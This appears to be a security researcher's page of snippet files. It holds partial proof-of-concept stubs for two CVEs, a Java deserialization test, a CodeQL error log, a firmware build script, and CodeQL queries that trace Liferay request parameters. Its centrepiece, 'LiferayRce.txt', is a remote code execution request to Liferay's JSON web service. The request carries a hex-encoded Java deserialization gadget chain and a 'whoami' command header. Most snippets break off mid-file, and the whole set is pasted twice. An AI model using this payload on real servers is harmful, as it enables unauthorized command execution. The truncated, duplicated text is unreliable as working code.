testanull

## PoC_CVE-2021–31474.json
POST /api/Action/TestAction HTTP/1.1
Host: <target>
Content-Length: 3978
Accept: application/json, text/javascript, */*; q=0.01
X-XSRF-TOKEN: <token>
X-Requested-With: XMLHttpRequest
ViewLimitationID: 0
User-Agent: Mozilla/5.0
Content-Type: application/json; charset=UTF-8
Cookie: <cookie>

## PoC_CVE-2021-28482.py
import requests
import time
import sys
from base64 import b64encode
from requests_ntlm2 import HttpNtlmAuth
from urllib3.exceptions import InsecureRequestWarning
from urllib import quote_plus

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

## Test0.java
import flex.messaging.io.SerializationContext;
import flex.messaging.io.amf.*;
import org.apache.commons.collections.LRUMap;

import java.io.*;

public class Test0 {
    public static void main(String[] args) throws Exception{
        LRUMap lruMap = new LRUMap();
        byte[] ser = serialize(lruMap);

## codeql_err.log
PS D:\Research\semmle\vscode-codeql-starter\ql> codeql query compile ../ql/cpp/ql/src/Security/CWE/CWE-079/CgiXss.ql
Compiling query plan for D:\Research\semmle\vscode-codeql-starter\ql\cpp\ql\src\Security\CWE\CWE-079\CgiXss.ql.
ERROR: extraneous input 'cached' expecting one of: 'or', ';' (D:\Research\semmle\vscode-codeql-starter\ql\cpp\ql\src\semmle\code\cpp\ir\implementation\aliased_ssa\internal\SSAConstruction.qll:45,3-9)
Failed [1/1] D:\Research\semmle\vscode-codeql-starter\ql\cpp\ql\src\Security\CWE\CWE-079\CgiXss.ql (3 s).
PS D:\Research\semmle\vscode-codeql-starter\ql> codeql query compile ../ql/cpp/ql/src/Security/CWE/CWE-079/CgiXss.ql --no-default-compilation-cache
Compiling query plan for D:\Research\semmle\vscode-codeql-starter\ql\cpp\ql\src\Security\CWE\CWE-079\CgiXss.ql.
ERROR: extraneous input 'cached' expecting one of: 'or', ';' (D:\Research\semmle\vscode-codeql-starter\ql\cpp\ql\src\semmle\code\cpp\ir\implementation\aliased_ssa\internal\SSAConstruction.qll:45,3-9)
Failed [1/1] D:\Research\sem

## Makefile.iot
export CONFIG_BCM_CPU_ARCH_NAME=mips32
export PROFILE=96838GWO
dpkg --add-architecture i386 && apt update && apt install -y locales nano git make autoconf gcc g++ xxd libz-dev wget file gcc-multilib g++-multilib autoconf
apt-get install libacl1-dev  libuuid1:i386 uuid-dev uuid-dev:i386 zlib1g-dev zlib1g-dev:i386 liblzo2-dev liblzo2-dev:i386 pkg-config flex bison

git clone https://github.com/weihutaisui/BCM/
find . -iname "*.pl" -exec chmod +x {} \;
find . -iname "*.sh" -exec chmod +x {} \;
find . -iname "configure" -exec chmod +x {} \;
find . -iname "gen_dt_bindings" -exec chmod +x {} \;

## globaldataflow.ql
import semmle.code.java.dataflow.DataFlow

class MyDataFlowConfiguration extends DataFlow::Configuration {
  MyDataFlowConfiguration() { this = "MyDataFlowConfiguration" }

  override predicate isSource(DataFlow::Node source) {
    ...
  }

  override predicate isSink(DataFlow::Node sink) {

## isSource.ql
override predicate isSource(DataFlow::Node source) {
		source.asExpr().(MethodAccess) instanceof LiferayParamUtilGetString
}

## LiferayParamUtilGetString2.ql
class LiferayParamUtilGetString2 extends MethodAccess{
	LiferayParamUtilGetString2(){
		this.getMethod().hasName("getString")
		and this.getMethod().getDeclaringType().hasName("ParamUtil")
	}
}

## LiferayParamUtilGetString.ql
class LiferayParamUtilGetString extends MethodAccess{
	LiferayParamUtilGetString(){
		exists(MethodAccess ma|
			ma.getMethod().hasName("getString")
			and ma.getMethod().getDeclaringType().hasName("ParamUtil")
			and this = ma
		)
	}
}

## LiferayRce.txt
POST /api/jsonws/invoke HTTP/1.1
Host: <Host>
Connection: close
cmd2: whoami
Content-Type: application/x-www-form-urlencoded
Content-Length: 4912

cmd={"/expandocolumn/update-column":{}}&p_auth=<valid token>&formDate=<date>&columnId=123&name=asdasd&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73
	POST /api/Action/TestAction HTTP/1.1
	Host: <target>
	Content-Length: 3978
	Accept: application/json, text/javascript, /; q=0.01
	X-XSRF-TOKEN: <token>
	X-Requested-With: XMLHttpRequest
	ViewLimitationID: 0
	User-Agent: Mozilla/5.0
	Content-Type: application/json; charset=UTF-8
	Cookie: <cookie>
	import requests
	import time
	import sys
	from base64 import b64encode
	from requests_ntlm2 import HttpNtlmAuth
	from urllib3.exceptions import InsecureRequestWarning
	from urllib import quote_plus

	requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
	import flex.messaging.io.SerializationContext;
	import flex.messaging.io.amf.*;
	import org.apache.commons.collections.LRUMap;

	import java.io.*;

	public class Test0 {
	public static void main(String[] args) throws Exception{
	LRUMap lruMap = new LRUMap();
	byte[] ser = serialize(lruMap);
	PS D:\Research\semmle\vscode-codeql-starter\ql> codeql query compile ../ql/cpp/ql/src/Security/CWE/CWE-079/CgiXss.ql
	Compiling query plan for D:\Research\semmle\vscode-codeql-starter\ql\cpp\ql\src\Security\CWE\CWE-079\CgiXss.ql.
	ERROR: extraneous input 'cached' expecting one of: 'or', ';' (D:\Research\semmle\vscode-codeql-starter\ql\cpp\ql\src\semmle\code\cpp\ir\implementation\aliased_ssa\internal\SSAConstruction.qll:45,3-9)
	Failed [1/1] D:\Research\semmle\vscode-codeql-starter\ql\cpp\ql\src\Security\CWE\CWE-079\CgiXss.ql (3 s).
	PS D:\Research\semmle\vscode-codeql-starter\ql> codeql query compile ../ql/cpp/ql/src/Security/CWE/CWE-079/CgiXss.ql --no-default-compilation-cache
	Compiling query plan for D:\Research\semmle\vscode-codeql-starter\ql\cpp\ql\src\Security\CWE\CWE-079\CgiXss.ql.
	ERROR: extraneous input 'cached' expecting one of: 'or', ';' (D:\Research\semmle\vscode-codeql-starter\ql\cpp\ql\src\semmle\code\cpp\ir\implementation\aliased_ssa\internal\SSAConstruction.qll:45,3-9)
	Failed [1/1] D:\Research\sem
	export CONFIG_BCM_CPU_ARCH_NAME=mips32
	export PROFILE=96838GWO
	dpkg --add-architecture i386 && apt update && apt install -y locales nano git make autoconf gcc g++ xxd libz-dev wget file gcc-multilib g++-multilib autoconf
	apt-get install libacl1-dev libuuid1:i386 uuid-dev uuid-dev:i386 zlib1g-dev zlib1g-dev:i386 liblzo2-dev liblzo2-dev:i386 pkg-config flex bison

	git clone https://github.com/weihutaisui/BCM/
	find . -iname "*.pl" -exec chmod +x {} \;
	find . -iname "*.sh" -exec chmod +x {} \;
	find . -iname "configure" -exec chmod +x {} \;
	find . -iname "gen_dt_bindings" -exec chmod +x {} \;
	import semmle.code.java.dataflow.DataFlow

	class MyDataFlowConfiguration extends DataFlow::Configuration {
	MyDataFlowConfiguration() { this = "MyDataFlowConfiguration" }

	override predicate isSource(DataFlow::Node source) {
	...
	}

	override predicate isSink(DataFlow::Node sink) {
	override predicate isSource(DataFlow::Node source) {
	source.asExpr().(MethodAccess) instanceof LiferayParamUtilGetString
	}
	class LiferayParamUtilGetString2 extends MethodAccess{
	LiferayParamUtilGetString2(){
	this.getMethod().hasName("getString")
	and this.getMethod().getDeclaringType().hasName("ParamUtil")
	}
	}
	class LiferayParamUtilGetString extends MethodAccess{
	LiferayParamUtilGetString(){
	exists(MethodAccess ma\|
	ma.getMethod().hasName("getString")
	and ma.getMethod().getDeclaringType().hasName("ParamUtil")
	and this = ma
	)
	}
	}
	POST /api/jsonws/invoke HTTP/1.1
	Host: <Host>
	Connection: close
	cmd2: whoami
	Content-Type: application/x-www-form-urlencoded
	Content-Length: 4912

	cmd={"/expandocolumn/update-column":{}}&p_auth=<valid token>&formDate=<date>&columnId=123&name=asdasd&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73